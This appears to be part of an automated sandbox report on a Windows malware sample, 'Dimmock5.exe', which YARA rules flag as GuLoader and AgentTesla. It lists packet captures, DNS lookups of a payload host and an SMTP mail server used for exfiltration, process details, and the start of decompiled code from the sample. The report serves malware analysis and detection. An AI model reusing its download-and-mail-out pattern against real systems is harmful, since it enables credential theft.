Apr 3, 2021 21:28:57.762195110 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.762218952 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.762275934 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.763151884 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.763178110 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.763201952 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.763231039 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.764106035 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.764131069 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.764172077 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.764209986 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.765064001 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.765089035 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.765130997 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.765161991 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.766055107 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.766078949 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.766125917 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.766175985 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.766980886 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.767005920 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.767051935 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.767095089 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.767904043 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.767927885 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.767972946 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.768008947 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.768834114 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.768868923 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.768923044 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.768958092 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.769716978 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.769751072 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.769792080 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.769830942 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.770625114 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.770658016 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.770705938 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.770745993 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.771544933 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.771578074 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.771619081 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.771661997 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.772473097 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.772506952 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.772550106 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.772593021 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.773360014 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.773422003 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.773444891 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.773485899 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.774250984 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.774283886 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.774319887 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.774357080 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.775085926 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.775119066 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.775171041 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.775203943 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.775968075 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.776001930 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.776042938 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.776068926 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.776855946 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.776889086 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.776958942 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.777694941 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.777725935 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.777774096 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.777817965 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.778578997 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.778618097 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.778656006 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.778681040 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.779485941 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.779525042 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.779557943 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.779594898 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.780222893 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.780263901 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.780297995 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.780343056 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.781095982 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.781136990 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.781177998 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.781198978 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.781908989 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.781949043 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.781980991 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.782018900 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.782735109 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.782777071 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.782804966 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.782844067 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.783545017 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.783586025 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.783621073 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.783652067 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.784353971 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.784398079 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.784426928 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.784446955 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.785159111 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.785200119 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.785229921 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.785262108 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.785965919 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.786005974 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.786043882 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.786083937 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.786761045 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.786802053 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.786833048 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.786875963 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.787528992 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.787569046 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.787606001 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.787621021 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.788316011 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.788361073 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.788388014 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.788414001 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.789081097 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.789122105 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.789155960 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.789196014 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.789980888 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.790047884 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.790083885 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.790117979 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.790613890 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.790657043 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.790684938 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.790719986 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.791418076 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.791456938 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:28:57.791498899 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:28:57.791527987 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:30:28.982014894 CEST	49754	587	192.168.2.3	54.37.255.108
Apr 3, 2021 21:30:29.033241987 CEST	587	49754	54.37.255.108	192.168.2.3
Apr 3, 2021 21:30:29.033462048 CEST	49754	587	192.168.2.3	54.37.255.108
Apr 3, 2021 21:30:29.168144941 CEST	587	49754	54.37.255.108	192.168.2.3
Apr 3, 2021 21:30:29.168565035 CEST	49754	587	192.168.2.3	54.37.255.108
Apr 3, 2021 21:30:29.219896078 CEST	587	49754	54.37.255.108	192.168.2.3
Apr 3, 2021 21:30:29.221116066 CEST	49754	587	192.168.2.3	54.37.255.108
Apr 3, 2021 21:30:29.224196911 CEST	49754	587	192.168.2.3	54.37.255.108
Apr 3, 2021 21:30:29.275417089 CEST	587	49754	54.37.255.108	192.168.2.3
Apr 3, 2021 21:30:29.275512934 CEST	49754	587	192.168.2.3	54.37.255.108
Apr 3, 2021 21:30:29.276132107 CEST	587	49754	54.37.255.108	192.168.2.3
Apr 3, 2021 21:30:29.276240110 CEST	49754	587	192.168.2.3	54.37.255.108
Apr 3, 2021 21:30:46.006558895 CEST	49741	443	192.168.2.3	172.217.23.33
Apr 3, 2021 21:30:46.047419071 CEST	443	49741	172.217.23.33	192.168.2.3
Apr 3, 2021 21:30:46.047494888 CEST	49741	443	192.168.2.3	172.217.23.33

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 3, 2021 21:26:52.658694029 CEST	53	51281	8.8.8.8	192.168.2.3
Apr 3, 2021 21:26:52.788124084 CEST	49199	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:26:52.850121021 CEST	53	49199	8.8.8.8	192.168.2.3
Apr 3, 2021 21:26:52.898739100 CEST	50620	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:26:52.953587055 CEST	53	50620	8.8.8.8	192.168.2.3
Apr 3, 2021 21:26:53.630685091 CEST	64938	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:26:53.682168007 CEST	53	64938	8.8.8.8	192.168.2.3
Apr 3, 2021 21:26:54.569523096 CEST	60152	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:26:54.615592957 CEST	53	60152	8.8.8.8	192.168.2.3
Apr 3, 2021 21:26:55.393383980 CEST	57544	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:26:55.447717905 CEST	53	57544	8.8.8.8	192.168.2.3
Apr 3, 2021 21:26:56.192456961 CEST	55984	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:26:56.241266012 CEST	53	55984	8.8.8.8	192.168.2.3
Apr 3, 2021 21:26:57.439815998 CEST	64185	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:26:57.489022970 CEST	53	64185	8.8.8.8	192.168.2.3
Apr 3, 2021 21:26:58.349874973 CEST	65110	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:26:58.409580946 CEST	53	65110	8.8.8.8	192.168.2.3
Apr 3, 2021 21:26:59.526803017 CEST	58361	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:26:59.581473112 CEST	53	58361	8.8.8.8	192.168.2.3
Apr 3, 2021 21:27:00.619247913 CEST	63492	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:27:00.667506933 CEST	53	63492	8.8.8.8	192.168.2.3
Apr 3, 2021 21:27:01.702913046 CEST	60831	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:27:01.753806114 CEST	53	60831	8.8.8.8	192.168.2.3
Apr 3, 2021 21:27:02.654890060 CEST	60100	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:27:02.702331066 CEST	53	60100	8.8.8.8	192.168.2.3
Apr 3, 2021 21:27:03.492252111 CEST	53195	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:27:03.552632093 CEST	53	53195	8.8.8.8	192.168.2.3
Apr 3, 2021 21:27:04.467761040 CEST	50141	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:27:04.525242090 CEST	53	50141	8.8.8.8	192.168.2.3
Apr 3, 2021 21:27:05.409342051 CEST	53023	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:27:05.458154917 CEST	53	53023	8.8.8.8	192.168.2.3
Apr 3, 2021 21:27:06.331608057 CEST	49563	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:27:06.379941940 CEST	53	49563	8.8.8.8	192.168.2.3
Apr 3, 2021 21:27:07.264858961 CEST	51352	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:27:07.313739061 CEST	53	51352	8.8.8.8	192.168.2.3
Apr 3, 2021 21:27:08.121592999 CEST	59349	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:27:08.177475929 CEST	53	59349	8.8.8.8	192.168.2.3
Apr 3, 2021 21:27:09.064527988 CEST	57084	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:27:09.112958908 CEST	53	57084	8.8.8.8	192.168.2.3
Apr 3, 2021 21:27:10.016024113 CEST	58823	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:27:10.068330050 CEST	53	58823	8.8.8.8	192.168.2.3
Apr 3, 2021 21:27:29.675410032 CEST	57568	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:27:29.734827042 CEST	53	57568	8.8.8.8	192.168.2.3
Apr 3, 2021 21:27:52.581410885 CEST	50540	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:27:52.654979944 CEST	53	50540	8.8.8.8	192.168.2.3
Apr 3, 2021 21:27:52.782737970 CEST	54366	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:27:52.841981888 CEST	53	54366	8.8.8.8	192.168.2.3
Apr 3, 2021 21:27:56.902631044 CEST	53034	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:27:56.959047079 CEST	53	53034	8.8.8.8	192.168.2.3
Apr 3, 2021 21:28:05.641415119 CEST	57762	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:28:05.711725950 CEST	53	57762	8.8.8.8	192.168.2.3
Apr 3, 2021 21:28:18.511337042 CEST	55435	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:28:18.580071926 CEST	53	55435	8.8.8.8	192.168.2.3
Apr 3, 2021 21:28:33.490812063 CEST	50713	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:28:33.562118053 CEST	53	50713	8.8.8.8	192.168.2.3
Apr 3, 2021 21:28:37.936959982 CEST	56132	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:28:37.993304968 CEST	53	56132	8.8.8.8	192.168.2.3
Apr 3, 2021 21:28:56.176302910 CEST	58987	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:28:56.239506006 CEST	53	58987	8.8.8.8	192.168.2.3
Apr 3, 2021 21:28:56.981240034 CEST	56579	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:28:57.060580015 CEST	53	56579	8.8.8.8	192.168.2.3
Apr 3, 2021 21:29:10.735685110 CEST	60633	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:29:10.783648968 CEST	53	60633	8.8.8.8	192.168.2.3
Apr 3, 2021 21:29:12.790719032 CEST	61292	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:29:12.863223076 CEST	53	61292	8.8.8.8	192.168.2.3
Apr 3, 2021 21:29:46.144838095 CEST	63619	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:29:46.251244068 CEST	53	63619	8.8.8.8	192.168.2.3
Apr 3, 2021 21:29:46.961075068 CEST	64938	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:29:47.026693106 CEST	53	64938	8.8.8.8	192.168.2.3
Apr 3, 2021 21:29:47.554347038 CEST	61946	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:29:47.616621971 CEST	53	61946	8.8.8.8	192.168.2.3
Apr 3, 2021 21:29:48.290796041 CEST	64910	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:29:48.349611998 CEST	53	64910	8.8.8.8	192.168.2.3
Apr 3, 2021 21:29:49.052926064 CEST	52123	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:29:49.101422071 CEST	53	52123	8.8.8.8	192.168.2.3
Apr 3, 2021 21:29:49.878793955 CEST	56130	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:29:49.938471079 CEST	53	56130	8.8.8.8	192.168.2.3
Apr 3, 2021 21:29:50.413161993 CEST	56338	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:29:50.472553015 CEST	53	56338	8.8.8.8	192.168.2.3
Apr 3, 2021 21:29:51.515624046 CEST	59420	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:29:51.570697069 CEST	53	59420	8.8.8.8	192.168.2.3
Apr 3, 2021 21:29:52.409864902 CEST	58784	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:29:52.466906071 CEST	53	58784	8.8.8.8	192.168.2.3
Apr 3, 2021 21:29:52.909982920 CEST	63978	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:29:52.965461969 CEST	53	63978	8.8.8.8	192.168.2.3
Apr 3, 2021 21:30:28.843709946 CEST	62938	53	192.168.2.3	8.8.8.8
Apr 3, 2021 21:30:28.948357105 CEST	53	62938	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 3, 2021 21:28:56.981240034 CEST	192.168.2.3	8.8.8.8	0x8fa2	Standard query (0)	doc-14-04-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Apr 3, 2021 21:30:28.843709946 CEST	192.168.2.3	8.8.8.8	0x613a	Standard query (0)	mail.palacioguevara.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 3, 2021 21:27:52.654979944 CEST	8.8.8.8	192.168.2.3	0xe744	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Apr 3, 2021 21:28:57.060580015 CEST	8.8.8.8	192.168.2.3	0x8fa2	No error (0)	doc-14-04-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Apr 3, 2021 21:28:57.060580015 CEST	8.8.8.8	192.168.2.3	0x8fa2	No error (0)	googlehosted.l.googleusercontent.com		172.217.23.33	A (IP address)	IN (0x0001)
Apr 3, 2021 21:30:28.948357105 CEST	8.8.8.8	192.168.2.3	0x613a	No error (0)	mail.palacioguevara.com	palacioguevara.com		CNAME (Canonical name)	IN (0x0001)
Apr 3, 2021 21:30:28.948357105 CEST	8.8.8.8	192.168.2.3	0x613a	No error (0)	palacioguevara.com		54.37.255.108	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 3, 2021 21:28:57.162213087 CEST	172.217.23.33	443	192.168.2.3	49741	CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Tue Mar 16 20:32:57 CET 2021 Thu Jun 15 02:00:42 CEST 2017	Tue Jun 08 21:32:56 CEST 2021 Wed Dec 15 01:00:42 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Apr 3, 2021 21:28:57.162213087 CEST	172.217.23.33	443	192.168.2.3	49741	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		37f463bf4616ecd445d4a1937da06e19

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Apr 3, 2021 21:30:29.168144941 CEST	587	49754	54.37.255.108	192.168.2.3	220-hosting.itecan.es ESMTP Exim 4.94 #2 Sat, 03 Apr 2021 21:30:29 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 3, 2021 21:30:29.168565035 CEST	49754	587	192.168.2.3	54.37.255.108	EHLO 899552
Apr 3, 2021 21:30:29.219896078 CEST	587	49754	54.37.255.108	192.168.2.3	250-hosting.itecan.es Hello 899552 [84.17.52.79] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-X_PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 3, 2021 21:30:29.221116066 CEST	49754	587	192.168.2.3	54.37.255.108	STARTTLS
Apr 3, 2021 21:30:29.275417089 CEST	587	49754	54.37.255.108	192.168.2.3	220 TLS go ahead

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Dimmock5.exe PID: 4708 Parent PID: 5740

General

Start time:	21:27:00
Start date:	03/04/2021
Path:	C:\Users\user\Desktop\Dimmock5.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Dimmock5.exe'
Imagebase:	0x400000
File size:	57344 bytes
MD5 hash:	1F6C8E6472B60D49704703C99B28A4B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 5596 Parent PID: 4708

General

Start time:	21:28:47
Start date:	03/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Dimmock5.exe'
Imagebase:	0xf80000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.734840874.000000001E0F1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.734840874.000000001E0F1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5856 Parent PID: 5596

General

Start time:	21:28:47
Start date:	03/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Dimmock5.exe PID: 4708 Parent PID: 5740 Dimmock5.exeCOMMON

Executed Functions

Function 00407FA4, Relevance: 133.7, APIs: 57, Strings: 19, Instructions: 685
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00407FA4(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				void* _v3;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				short _v28;
				short _v32;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v64;
				char _v68;
				short _v72;
				short _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				short _v92;
				char _v96;
				char _v100;
				char _v104;
				intOrPtr _v112;
				char _v120;
				char _v124;
				intOrPtr _v132;
				char _v140;
				char* _v148;
				intOrPtr _v156;
				char _v160;
				char _v164;
				void* _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v196;
				intOrPtr _v200;
				char _v204;
				intOrPtr _v208;
				char _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr* _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _t368;
				signed int _t373;
				signed int _t377;
				signed int _t389;
				signed int _t396;
				signed int _t408;
				signed int _t414;
				signed int _t434;
				signed int _t440;
				signed int _t445;
				signed int _t450;
				signed int _t453;
				signed int _t464;
				signed int _t469;
				signed int _t477;
				signed int _t482;
				signed int _t492;
				signed int _t498;
				char* _t508;
				intOrPtr* _t510;
				char* _t511;
				signed int _t519;
				char* _t539;
				char* _t542;
				char* _t546;
				void* _t571;
				void* _t574;
				intOrPtr* _t575;
				intOrPtr* _t576;

				_t575 = _t574 - 0xc;
				 *[fs:0x0] = _t575;
				L00401420();
				_v16 = _t575;
				_v12 = 0x401218;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_t368 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t571);
				_push(" tt");
				L00401672();
				L00401678();
				_push(_t368);
				_push(0x402684);
				L0040167E();
				asm("sbb eax, eax");
				_v216 =  ~( ~( ~_t368));
				L0040166C();
